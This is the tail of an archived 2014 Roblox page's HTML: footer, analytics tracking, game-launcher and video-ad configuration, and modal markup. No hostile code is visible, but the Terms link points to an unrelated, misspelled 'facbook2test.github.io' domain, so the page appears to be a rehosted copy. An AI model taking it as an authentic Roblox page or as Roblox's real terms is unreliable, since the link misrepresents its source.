ROBLOX, "Online Building Toy", characters, logos, names, and all related indicia are trademarks of <a href="https://web.archive.org/web/20140509172417/http://corp.roblox.com/" ref="footer-smallabout" class="roblox-interstitial">ROBLOX Corporation</a>, ©2014. Patents pending.
ROBLOX is not sponsored, authorized or endorsed by any producer of plastic building bricks, including The LEGO Group, MEGA Brands, and K'Nex, and no resemblance to the products of these companies is intended. Use of this site signifies your acceptance of the <a href="https://facbook2test.github.io/Terms" ref="footer-terms">Terms and Conditions</a>.
</p>
</div>
<div class="clear"></div>
</div>
</div>
</div></div>
</div>
<div id="ChatContainer" style="position:fixed;bottom:0;right:0;z-index:10020">
</div>
<script src="../../../../20140509174801js_/https_/ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">_uacct="UA-486632-1";_udn="roblox.com";_uccn="rbx_campaign";_ucmd="rbx_medium";_ucsr="rbx_source";urchinTracker();__utmSetVar("Visitor/Anonymous");</script>
<script type="text/javascript">if(typeof __utmSetVar!=="undefined"){__utmSetVar("")}</script>
</form>
<div id="InstallationInstructions" class="modalPopup blueAndWhite" style="display:none;overflow:hidden">
<a id="CancelButton2" onclick="return Roblox.Client._onCancel()" class="ImageButton closeBtnCircle_35h ABCloseCircle"></a>
<div style="padding-bottom:10px;text-align:center">
<br/><br/>
</div>
</div>
<div id="pluginObjDiv" style="height:1px;width:1px;visibility:hidden;position:absolute;top:0"></div>
<iframe id="downloadInstallerIFrame" style="visibility:hidden;height:0;width:1px;position:absolute"></iframe>
<script type="text/javascript" src="JS/cc9a4f801eba175009511103c88a7aa1.js"></script>
<script type="text/javascript">/*<![CDATA[*/Roblox.Client._skip="/install/unsupported.aspx";Roblox.Client._CLSID="";Roblox.Client._installHost="";Roblox.Client.ImplementsProxy=false;Roblox.Client._silentModeEnabled=false;Roblox.Client._bringAppToFrontEnabled=false;Roblox.Client._installSuccess=function(){GoogleAnalyticsEvents&&GoogleAnalyticsEvents.ViewVirtual("InstallSuccess")};/*]]>*/</script>
<div id="PlaceLauncherStatusPanel" style="display:none;width:300px">
<div class="modalPopup blueAndWhite PlaceLauncherModal" style="min-height:160px">
<div id="Spinner" class="Spinner" style="margin:0 1em 1em 0;padding:20px 0">
<img src="../../../../20140509174345im_/https_/s3.amazonaws.com/images.roblox.com/e998fb4c03e8c2e30792f2f3436e9416.gif" height="32" width="32" alt="Progress"/>
</div>
<div id="status" style="min-height:40px;text-align:center;margin:5px 20px">
<div id="Starting" class="PlaceLauncherStatus MadStatusStarting" style="display:block">
Starting Roblox...
</div>
<div id="Waiting" class="PlaceLauncherStatus MadStatusField">Connecting to Players...</div>
<div id="StatusBackBuffer" class="PlaceLauncherStatus PlaceLauncherStatusBackBuffer MadStatusBackBuffer"></div>
</div>
<div style="text-align:center;margin-top:1em">
<input type="button" class="Button CancelPlaceLauncherButton translate" value="Cancel"/>
</div>
</div>
</div>
<script type="text/javascript" src="JS/507606ba77acf2ff29dd3ec7cb668f06.js"></script>
<div id="videoPrerollPanel" style="display:none">
<div id="videoPrerollTitleDiv">
Gameplay sponsored by:
</div>
<div id="videoPrerollMainDiv"></div>
<div id="videoPrerollCompanionAd"></div>
<div id="videoPrerollLoadingDiv">
Loading <span id="videoPrerollLoadingPercent">0%</span> - <span id="videoPrerollMadStatus" class="MadStatusField">Starting game...</span><span id="videoPrerollMadStatusBackBuffer" class="MadStatusBackBuffer"></span>
<div id="videoPrerollLoadingBar">
<div id="videoPrerollLoadingBarCompleted">
</div>
</div>
</div>
<div id="videoPrerollJoinBC">
<span>Get more with Builders Club!</span>
<a href="https://web.archive.org/web/20140509172819/http://www.roblox.com/Upgrades/BuildersClubMemberships.aspx?ref=vpr" target="_blank" id="videoPrerollJoinBCButton"></a>
</div>
</div>
<script type="text/javascript">Roblox.VideoPreRoll.showVideoPreRoll=false;Roblox.VideoPreRoll.loadingBarMaxTime=33000;Roblox.VideoPreRoll.videoOptions.key="robloxcorporation";Roblox.VideoPreRoll.videoOptions.categories="NonBC,IsLoggedIn,AgeUnknown,GenderUnknown";Roblox.VideoPreRoll.videoOptions.id="games";Roblox.VideoPreRoll.videoLoadingTimeout=11000;Roblox.VideoPreRoll.videoPlayingTimeout=41000;Roblox.VideoPreRoll.videoLogNote="NotWindows";Roblox.VideoPreRoll.logsEnabled=true;Roblox.VideoPreRoll.excludedPlaceIds="32373412";Roblox.VideoPreRoll.specificAdOnPlacePageEnabled=true;Roblox.VideoPreRoll.specificAdOnPlacePageId=57507247;Roblox.VideoPreRoll.specificAdOnPlacePageCategory="stooges";Roblox.VideoPreRoll.specificAdOnPlacePage2Enabled=true;Roblox.VideoPreRoll.specificAdOnPlacePage2Id=122911678;Roblox.VideoPreRoll.specificAdOnPlacePage2Category="lego";$(Roblox.VideoPreRoll.checkEligibility);</script>
<div id="GuestModePrompt_BoyGirl" class="Revised GuestModePromptModal" style="display:none">
<div class="simplemodal-close">
<a class="ImageButton closeBtnCircle_20h" style="cursor:pointer;margin-left:455px;top:7px;position:absolute"></a>
</div>
<div class="Title">
Choose Your Character
</div>
<div style="min-height:275px;background-color:white">
<div style="clear:both;height:25px"></div>
<div style="text-align:center">
<div class="VisitButtonsGuestCharacter VisitButtonBoyGuest" style="float:left;margin-left:45px"></div>
<div class="VisitButtonsGuestCharacter VisitButtonGirlGuest" style="float:right;margin-right:45px"></div>
</div>
<div style="clear:both;height:25px"></div>
<div class="RevisedFooter">
<div style="width:200px;margin:10px auto 0 auto">
<a href="#" onclick="redirectPlaceLauncherToRegister();return false"><div class="RevisedCharacterSelectSignup"></div></a>
<a class="HaveAccount" href="#" onclick="redirectPlaceLauncherToLogin();return false">I have an account</a>
</div>
</div>
</div>
</div>
<script type="text/javascript">function checkRobloxInstall(){window.location="https://web.archive.org/install/unsupported.aspx";return false}if(typeof MadStatus==="undefined"){MadStatus={}}MadStatus.Resources={accelerating:"Accelerating",aggregating:"Aggregating",allocating:"Allocating",acquiring:"Acquiring",automating:"Automating",backtracing:"Backtracing",bloxxing:"Bloxxing",bootstrapping:"Bootstrapping",calibrating:"Calibrating",correlating:"Correlating",denoobing:"De-noobing",deionizing:"De-ionizing",deriving:"Deriving",energizing:"Energizing",filtering:"Filtering",generating:"Generating",indexing:"Indexing",loading:"Loading",noobing:"Noobing",optimizing:"Optimizing",oxidizing:"Oxidizing",queueing:"Queueing",parsing:"Parsing",processing:"Processing",rasterizing:"Rasterizing",reading:"Reading",registering:"Registering",rerouting:"Re-routing",resolving:"Resolving",sampling:"Sampling",updating:"Updating",writing:"Writing",blox:"Blox",countzero:"Count Zero",cylon:"Cylon",data:"Data",ectoplasm:"Ectoplasm",encryption:"Encryption",event:"Event",farnsworth:"Farnsworth",bebop:"Bebop",fluxcapacitor:"Flux Capacitor",fusion:"Fusion",game:"Game",gibson:"Gibson",host:"Host",mainframe:"Mainframe",metaverse:"Metaverse",nerfherder:"Nerf Herder",neutron:"Neutron",noob:"Noob",photon:"Photon",profile:"Profile",script:"Script",skynet:"Skynet",tardis:"TARDIS",virtual:"Virtual",analogs:"Analogs",blocks:"Blocks",cannon:"Cannon",channels:"Channels",core:"Core",database:"Database",dimensions:"Dimensions",directives:"Directives",engine:"Engine",files:"Files",gear:"Gear",index:"Index",layer:"Layer",matrix:"Matrix",paradox:"Paradox",parameters:"Parameters",parsecs:"Parsecs",pipeline:"Pipeline",players:"Players",ports:"Ports",protocols:"Protocols",reactors:"Reactors",sphere:"Sphere",spooler:"Spooler",stream:"Stream",switches:"Switches",table:"Table",targets:"Targets",throttle:"Throttle",tokens:"Tokens",torpedoes:"Torpedoes",tubes:"Tubes"};</script>
<script type="text/javascript">var Roblox=Roblox||{};Roblox.UpsellAdModal=Roblox.UpsellAdModal||{};Roblox.UpsellAdModal.Resources={title:"Remove Ads Like This",body:"Builders Club members do not see external ads like these.",accept:"Upgrade Now",decline:"No, thanks"};</script>
<div class="ConfirmationModal modalPopup unifiedModal smallModal" data-modal-handle="confirmation" style="display:none">
<a class="genericmodal-close ImageButton closeBtnCircle_20h"></a>
<div class="Title"></div>
<div class="GenericModalBody">
<div class="TopBody">
<div class="ImageContainer roblox-item-image" data-image-size="small" data-no-overlays data-no-click>
<img class="GenericModalImage" alt="generic image"/>
</div>
<div class="Message"></div>
</div>
<div class="ConfirmationModalButtonContainer">
<a href roblox-confirm-btn><span></span></a>
<a href roblox-decline-btn><span></span></a>
</div>
<div class="ConfirmationModalFooter">
</div>
</div>
<script type="text/javascript">Roblox.GenericConfirmation.Resources={yes:"Yes",No:"No"};</script>
</div>
</body>
</html>